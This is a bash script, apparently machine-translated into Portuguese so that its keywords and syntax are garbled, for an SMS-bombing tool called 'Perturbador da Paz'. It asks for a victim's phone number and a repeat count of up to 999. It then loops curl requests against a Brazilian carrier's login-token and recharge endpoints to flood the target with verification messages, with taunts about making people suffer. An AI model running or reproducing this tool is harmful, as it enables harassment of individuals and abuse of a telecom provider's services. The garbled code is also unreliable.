#! / bin / bash
Claro
tit = $ "ㅤ ㅤ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠛⠋⠉⠙⠻⠿⠿⠿⠿⢿⣿⣿⣿⣿⣿⣿ \ n ㅤ ㅤ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⡿⠃⠄⠄⠄⠄⠄⠄⠄⠄⠹⣿⣿⣶⣶⣦⣬⢹⣿⣿ \ n ㅤ ㅤ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠄⠄⠄⣰⣧⡀⠄⠄⠄⠄⠈⢙⡋⣿⣿ ⣿⢸⣿⣿ \ n ㅤ ㅤ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄⠄⠰⠼⢯⣿⣿⣦⣄⠄⠄⠄⠈⢡⣿⣿⣿⢸⣿⣿ \ n ㅤ ㅤ ⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⠄⠄⠸⠤⠕⠛⠙⠷⣿⡆⠄⠄⠄⣸⣿⣿⡏⣼⣿⣿ \ n ㅤ ㅤ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣴⣿ ⣿⣿⢡⣿⣿⣿ \ n ㅤ ㅤ ⣿⣿⣿⣿⣿⣿⣿⣿⡟⠄⠄⠄⠄⠄⣄⠄⢀⠄⠄⢀⣤⣾⣿⣿⣿⢃⣾⣿⣿⣿ \ n ㅤ ㅤ ⣿⣿⣿⣿⣿⣿ ⠿⣛⣡⣄⣀⠄⠠⢴⣿⣿⡿⣄⣴⣿⣿⣿⣿⣿⢃⣾⣿⣿⣿⣿ \ n ㅤ ㅤ ⣿⣿⣿⣿⣿⡏⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣩ ⡽⡁⢸⣿⣿⣿⣿⣿ \ n ㅤ ㅤ ⣿⣿⣿⣿⣿⢃⣿⣿⢟⣿⣿⣿⣿⣿⣮⢫⣿⣿⣿⣿⣿⣟⢿⠃⠄⢻⣿⣿⣿⣿ \ n ㅤ ㅤ ⣿⣿⣿⣿ ⡿⣸⠟⣵⣿⣿⣿⣿⣿⣿⣿⣾⣿⣿⣿⣿⣿⣿⣷⣄⢰⡄⢿⣿⣿⣿ \ n ㅤ ㅤ ⣿⣿⣿⣿⡇⠏⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣦⠹⡎⣿⣿⣿ \ n \ e [33; 01m██▀ ﾠ █▄█ ﾠ █ ﾠ ▄▀▀ ﾠ ▄▀▄ ﾠ █▀▄ ﾠ ██▀ ﾠ █▄ ﾠ █ ﾠ █ █▀ ﾠ █▀▄ \ n█▄▄ ﾠ █ ﾠ █ ﾠ █ ﾠ ▄██ ﾠ ▀▄▀ ﾠ █▀ ﾠ ﾠ █▄▄ ﾠ █ ﾠ ▀█ ﾠ █▄▄ ﾠ █▀▄ \ e [0m \ n ㅤ ㅤ ⡀⠈⢿⠄⣿⡇⠄⠙⠿⣿⡿⠿⢋⣥⣾⣿⣷⣌⠻⢿⣿⣿⡿⠟⣡⣾⣿⣿⠿⢋ \ n ㅤ ㅤ ⠛⠳⠄⢠⣿⠇⠄⣷⡑⢶⣶⢿ ⣿⣿⣿⣽⣿⣿⣿⣶⣶⡐⣶⣿⠿⠛⣩⡄⠄⢸ "
echo -e $ tit
dormir 0,5
eco
echo -e " \ e [01; 37; 41m • PERTURBADOR DA PAZ • \ e [0m "
dormir 0,5
eco
echo -e " \ e [01; 37; 41m COLOQUE O DDD + NUMERO \ e [0m "
aa = $ ( echo -e " \ e [01; 37mNÚMERO: \ e [0m " )
ler -p " $ aa " NUMERO

echo -e " \ e [01; 37; 41m RODAR QUANTAS VEZES? \ e [0m "
enquanto  : ;  Faz
echo -e ' \ e [01; 37m (1) 50x \ c ' ;  echo -e ' | (2) 100x \ c ' ;  echo -e ' | (3) 500x \ c ' ;  echo -e ' | (4) 999x \ e [0m '

bb = $ ( echo -e " \ e [01; 37mOpção: \ e [0m " )
leia -n1 -p " $ bb " xx
caso  $ xx  em
        (1) VEZES = 50 ;  eco ;  echo -e ' \ e [01; 37; 41m Só 50? esperava mais de você ... \ e [0m ' | pv -qL 18
        dormir 2
        quebrar ;;
        (2) VEZES = 100 ;  eco ;  echo -e ' \ e [01; 37; 41m 100 é legal, mas esperava mais de você ... \ e [0m ' | pv -qL 18
        dormir 2
        quebrar ;;
        (3) VEZES = 500 ;  eco ;  echo -e ' \ e [01; 37; 41m Agora sim 500, esse é meu garoto \ e [0m ' | pv -qL 18
        dormir 2
        quebrar ;;
        (4) VEZES = 999 ;  eco ;  echo -e ' \ e [01; 37; 41m 999? ... cara, vou deixar você andar comigo no recreio \ e [0m ' | pv -qL 18
        dormir 2,5
        quebrar ;;
        ( * ) eco ;  echo -e " \ e [01; 37; 41m CALMA BARBOLETA \ e [0m "
        dormir 1
esac
feito
dormir 0,5
Claro
echo -e $ tit
eco
echo -e " \ e [01; 37; 41m • PERTURBADOR DA PAZ • \ e [0m "
eco
echo -e " \ e [01; 37; 41m VAI BRASILIAM \ e [0m " | pv -qL 15
echo -e " \ e [01; 37; 41m NUMERO: $ NUMERO | QUANTIDADE: $ VEZES \ e [0m "
dormir 0,5
eco
echo -e " \ e [0m \ e [01; 37; 41m INICIANDO O CHORO \ e [0m "
para  i  em  $ ( seq $ VEZES ) ;
Faz
response = $ ( data = $ " numero = $ NUMERO "  && site = $ " https://login.vivo.com.br/mobile/br/com/vivo/mobile/portlets/loginmobile/sendTokenRequest.do "  && curl -s " $ {site} " -H " User-Agent: Android " -d " $ {data} " )
body = $ ( echo $ response  | jq ' .code ' )

case  $ body  in
101) echo -e " \ e [01; 33mCOLOCOU O NUMERO ERRADO ... \ e [0m \ e [01; 37mINICIANDO O PRÓXIMO ... \ e [0m " | pv -qL 20 ; dormir .5 ;  quebrar ;;
0) echo -e " \ e [01; 32mAGORA SÓ ESPERAR O CHORO \ e [0m \ e [01; 37mCONTAGEM: $ i \ e [0m " | pv -qL 18 ;;
* ) echo -e " Informe Vivo: IMEI capturado, pode ser bloqueado pelo uso indevido conforme regulamento em nossa Rede, ligue no 1058 ... \ e [0m \ e [01; 37mINICIANDO O PROXIMO ... \ e [0m " ;  echo  $ response ;  pausa
esac
feito
eco
echo -e " \ e [0m \ e [01; 37; 41m INICIANDO O CHORO 2 \ e [0m "
para  i  em  $ ( seq $ VEZES ) ;
Faz
response = $ ( site = $ " http://portalrecarga.vivo.com.br/lp/login/descontosslidemodalBoticario?offerID=15396&serviceID=30 "  && curl -s " $ site " -d " ddd = & number = $ NUMERO & callbackUrl = & eventName = clickconfirmation " )
body = $ ( echo $ response  | grep -c form-pincode )

case  $ body  in
1) echo -e " \ e [01; 32mAGORA SÓ ESPERAR O CHORO \ e [0m \ e [01; 37mCONTAGEM: $ i \ e [0m " | pv -qL 18 ;;
* ) echo -e " CORRE BERG \ e [0m \ e [01; 37mFINALIZANDO ... \ e [0m " ;  echo  $ response ;  pausa
esac
feito
eco
echo -e " \ e [01; 37; 41m • Fim de transmissão • \ e [0m "
echo -e ' \ e [01; 37; 41m Bora fazer mais gente passar raiva? \ e [0m '
dormir 0,5
enquanto  : ;  Faz
echo -e ' \ e [01; 37m (1) \ e [0m Sim \ e [0m '
echo -e ' \ e [01; 37m (2) \ e [0m Não \ e [0m '
cc = $ ( echo -e " \ e [01; 37mOpção: \ e [0m " )
leia -n1 -p " $ cc " cpo
case  $ cpo  em
        (1) eco ;  echo -e ' \ e [01; 37; 41m E lá vamos nós | @EhisOpeNer \ e [0m ' | pv -qL 18
        dormir 2 ; ./ospacotesmb
        quebrar ;;
        (2) eco ;  echo -e " \ e [01; 37; 41m Tchau, tchau | @EhisOpeNer \ e [0m " | pv -qL 15 ;  echo -e " \ e [01; 37; 41m TUDO NUMA BOA \ e [0m " | pv -qL 18
        dormir 1
        quebrar ;;
        ( * ) eco ;  echo -e " \ e [01; 37; 41m CALMA BARBOLETA \ e [0m "
        dormir 1
esac
feito
